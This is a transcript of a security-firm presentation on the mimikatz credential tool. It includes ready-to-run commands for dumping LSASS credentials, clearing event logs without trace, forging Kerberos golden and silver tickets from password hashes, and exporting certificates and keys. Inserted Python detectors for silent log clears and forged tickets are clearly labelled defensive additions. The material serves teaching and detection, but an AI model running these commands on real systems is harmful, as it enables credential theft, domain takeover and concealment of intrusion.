
Mimikatz

Prashant
August 31, 2018

Just another presentation on mimikatz

Transcript

  1. mimikatz: A little tool to play with Windows security. Prashant Mahajan. 31 August 18.
     Sense of Security Pty Ltd, ABN 14 098 237 908, @ITSecurityAU. Compliance, Protection & Business Confidence.
     Sydney: Level 8, 59 Goulburn Street, Sydney NSW 2000. Melbourne: Level 15, 401 Docklands Drive, Docklands VIC 3008. Tel. 1300 922 923, Intl. +61 2 9290 4444, www.senseofsecurity.com.au
  2. Authors
     • Benjamin DELPY: you can contact him on Twitter (@gentilkiwi) or by mail (benjamin [at] gentilkiwi.com), or visit his blog (http://blog.gentilkiwi.com/).
     • Vincent LE TOUX: a few contributions to mimikatz, including the DCSync function in the lsadump module. You can contact him on Twitter (@mysmartlogon) or by mail (vincent.letoux [at] gmail.com), or visit his website (http://www.mysmartlogon.com).
  3. Agenda
     • sekurlsa::logonpasswords
     • Just scratching the surface on the capabilities
     • SekurLSA module
     • Event module
     • DCSync
     • Golden Ticket
     • Silver Ticket
     • Skeleton Key
     • SIDHistory
     • DCShadow
  4. Credentials in Memory?!
     • After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory.
     • This is meant to facilitate Single Sign-On (SSO), ensuring a user isn’t prompted each time resource access is requested.
     • The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords to support WDigest and SSP authentication, among others.
     https://adsecurity.org/?page_id=1821
  5. Credential Data Chart
     Benjamin Delpy posted an Excel chart on OneDrive (no longer available).
     http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png
  6. ProcDump or Task Manager
     procdump.exe -accepteula -ma lsass.exe lsass.dmp
     sekurlsa::minidump lsass.dmp
     sekurlsa::logonpasswords
     https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
  7. RunAsPPL
     The Local Security Authority (LSA), which resides within the Local Security Authority Subsystem Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1, but is on by default in Windows RT 8.1 and cannot be changed.
     https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management
  8. Event module
     privilege::debug: get debug privileges.
     event::drop: patch the Events service to avoid new events.
     event::clear: clear the event log without any "log cleared" event (1102) being logged.
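A defender-side check derived from the event::clear behaviour on the slide above, added here as an example and not part of the presentation. It assumes (an assumption, not something the slides state) that clearing a Windows event log restarts its EventRecordID numbering and that a legitimate clear writes event 1102 as the first record of the new sequence, so a numbering reset with no 1102 at its head is the signal to alert on:

```python
"""Spot an event log that was emptied without the expected 1102 "log cleared" record.

Added example, not from the slides. Assumption: clearing a Windows event log restarts its
EventRecordID sequence, and a legitimate clear writes event 1102 as the first record of the
new sequence. A clear that leaves no 1102 behind (what event::clear aims for) therefore shows
up as a record-ID reset whose first record is something other than 1102.
"""
from typing import List, Tuple

LOG_CLEARED = 1102

# Constructed sample feed: (EventRecordID, EventID) tuples in collection order for ONE log on
# ONE host, e.g. as forwarded to a SIEM. Values are made up for the example.
SAMPLE_RECORDS: List[Tuple[int, int]] = [
    (1041, 4624), (1042, 4672), (1043, 4688),   # normal activity
    (1, 1102), (2, 4624),                       # legitimate clear: 1102 opens the new sequence
    (3, 4688), (4, 4624),
    (1, 4624), (2, 4688),                       # reset with no 1102 at its head: suspicious
]


def find_silent_clears(records: List[Tuple[int, int]]) -> List[int]:
    """Return positions in `records` where the record-ID sequence restarted without a 1102."""
    suspicious: List[int] = []
    prev_id = None
    for idx, (record_id, event_id) in enumerate(records):
        # A record ID lower than the previous one means the log was emptied in between.
        if prev_id is not None and record_id < prev_id and event_id != LOG_CLEARED:
            suspicious.append(idx)
        prev_id = record_id
    return suspicious


if __name__ == "__main__":
    for pos in find_silent_clears(SAMPLE_RECORDS):
        print(f"record-ID reset without 1102 at feed position {pos}: {SAMPLE_RECORDS[pos]}")
```

Record-ID ordering only holds per log and per host, so run the check on each log source separately rather than on a merged feed.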
  9. Golden Ticket
     • A Golden Ticket (GT) is a TGT using the KRBTGT NTLM password hash to encrypt and sign.
     • A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.
     • Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History), since the TGT is used to get service tickets (TGS) used to access resources.
     • The GT contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT), which can only be opened and read by the KRBTGT account.
     https://adsecurity.org/?page_id=1821
  10. Golden Ticket
     To summarize, once an attacker gets access to the KRBTGT password hash (NTLM/RC4/AES128/AES256), they can create Golden Tickets (TGT) that can provide access to anything in AD at any time. Mimikatz adds the following groups to the ticket by default:
     • Domain Users, SID: S-1-5-21<DOMAINID>-513
     • Domain Admins, SID: S-1-5-21<DOMAINID>-512
     • Schema Admins, SID: S-1-5-21<DOMAINID>-518
     • Enterprise Admins, SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the forest root domain; otherwise add it using the /sids parameter for AD forest admin rights)
     • Group Policy Creator Owners, SID: S-1-5-21<DOMAINID>-520
     https://adsecurity.org/?page_id=1821
  11. Golden Ticket
     kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt
     • /user: account to be impersonated, or any username
     • /id: RID of the account to be impersonated. This could be a real account ID, such as the default administrator ID of 500, or a fake ID.
     • /groups: list of groups to which the account in the ticket will belong
     • /sids: insert a SID into the SIDHistory attribute of the account in the ticket
     • /ptt: Pass the Ticket, to load the golden ticket into the current session
  12. Silver Ticket
     A Silver Ticket is a TGS (similar to a TGT in format) using the AD computer/service account (can be identified by SPN) NTLM password hash to encrypt and sign. Mimikatz adds the following groups to the ticket by default:
     • Domain Users, SID: S-1-5-21<DOMAINID>-513
     • Domain Admins, SID: S-1-5-21<DOMAINID>-512
     • Schema Admins, SID: S-1-5-21<DOMAINID>-518
     • Enterprise Admins, SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the forest root domain; otherwise add it using the /sids parameter for AD forest admin rights)
     • Group Policy Creator Owners, SID: S-1-5-21<DOMAINID>-520
     https://adsecurity.org/?page_id=1821
  13. Silver Ticket
     kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /server:http /ptt
     • /target: the host (SPN value). The sos.labs domain has dc1.sos.labs.
     • /service: the name of the service that we will create tickets for (must be a service running as the service account)
     • /user: the user that the ticket will be created for; this can be any user account whatsoever, even user accounts that do not exist
     • /groups: list of groups to which the account in the ticket will belong. Domain Admins is included by default.
     • /rc4: NTLM hash of the account, or /aes128 and /aes256 keys
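The Golden and Silver Ticket slides both list the group set mimikatz writes into a forged ticket's PAC by default, and the examples use a fake /id (9999) and a real one (1108). The check below is an added defender-side example, not code from the slides: it takes the account SID and group SIDs a defender would extract from Kerberos ticket events or a PAC decode (the records here are constructed, and KNOWN_ACCOUNTS is a hypothetical directory snapshot) and flags an unknown RID, the full mimikatz default group set, and groups from a foreign domain, which is what the /sids SIDHistory option produces:

```python
"""Flag Kerberos ticket group memberships that match mimikatz's default forged-ticket groups.

Added example, not code from the slides. Inputs are constructed to resemble the account SID and
group SID data pulled from Kerberos ticket events or a PAC decode; KNOWN_ACCOUNTS is a
hypothetical directory snapshot used to spot a fake /id.
"""
import re
from typing import Dict, List, Optional, Tuple

# Default RIDs mimikatz adds to a golden or silver ticket (per the slides): Domain Users (513),
# Domain Admins (512), Schema Admins (518), Enterprise Admins (519), GP Creator Owners (520).
MIMIKATZ_DEFAULT_RIDS = frozenset({512, 513, 518, 519, 520})

# Domain SID from the slide examples (sos.labs).
DOMAIN_SID = "S-1-5-21-2872888145-3513486857-3924934394"

# Constructed directory snapshot: RID -> account name. The golden ticket's /id:9999 is absent.
KNOWN_ACCOUNTS: Dict[int, str] = {500: "Administrator", 1108: "user1"}

_DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid: str) -> Optional[Tuple[str, int]]:
    """Split 'S-1-5-21-<domain>-<rid>' into (domain SID, RID); None for well-known SIDs."""
    m = _DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None


def assess_ticket(user_sid: str, group_sids: List[str]) -> List[str]:
    """Return findings for one ticket; an empty list means nothing looked forged."""
    findings: List[str] = []
    user = split_sid(user_sid)
    if user is None or user[0] != DOMAIN_SID:
        return [f"user SID {user_sid} is not from the expected domain"]
    if user[1] not in KNOWN_ACCOUNTS:
        findings.append(f"RID {user[1]} matches no known account (fake /id in the ticket?)")
    local_rids = set()
    foreign = []
    for sid in group_sids:
        parsed = split_sid(sid)
        if parsed is None:
            continue  # well-known SIDs such as S-1-5-11 are ignored here
        if parsed[0] == DOMAIN_SID:
            local_rids.add(parsed[1])
        else:
            foreign.append(sid)
    # Domain Users on its own is normal; the whole default set on one ticket is the signal.
    if MIMIKATZ_DEFAULT_RIDS <= local_rids:
        findings.append("group set contains all of mimikatz's default forged-ticket groups")
    if foreign:
        findings.append(f"groups from another domain (possible /sids SIDHistory use): {foreign}")
    return findings
```

The same group set can legitimately appear on a real forest-root administrator, so treat the default-set finding as a correlation signal alongside the unknown-RID and foreign-SID checks rather than a verdict on its own.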
  14. Skeleton Key
     • Inject the Skeleton Key into the LSASS process on a Domain Controller.
     • This enables all user authentication to the Skeleton Key patched DC to use a “master password” (mimikatz) (aka the Skeleton Key) as well as their usual password.
     • A reboot removes the Skeleton Key injection.
  15. DCShadow
     What can you do?
     • Add a user to privileged groups such as Domain Admins, Enterprise Admins
     • Add SIDHistory
     • Change PrimaryGroupID
     • Etc.
  16. DCShadow
     The following permissions on AD objects are required:
     Domain object
     • DS-Install-Replica (Add/Remove Replica in Domain)
     • DS-Replication-Manage-Topology (Manage Replication Topology)
     • DS-Replication-Synchronize (Replication Synchronization)
     Sites object in the Configuration container
     • CreateChild and DeleteChild
     Computer object of the attacker's machine (which is registered as a fake DC)
     • WriteProperty
     Target object (user or computer or ADSPath)
     • WriteProperty
     https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1
  17. mimikatz # privilege::debug
      Privilege '20' OK
      mimikatz # crypto::cng
      "KeyIso" service patched
      mimikatz # crypto::capi
      Local CryptoAPI patched
      mimikatz # crypto::certificates /export
       * System Store : 'CURRENT_USER' (0x00010000)
       * Store : 'My'
      mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
      mimikatz # crypto::keys /export
  18. Security, it’s all we do. Knowledge, Experience & Trust. Questions?
  19. Security, it’s all we do. Knowledge, Experience & Trust. Thank You!
      © 2002 – 2018 Sense of Security Pty Limited. All rights reserved. Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher.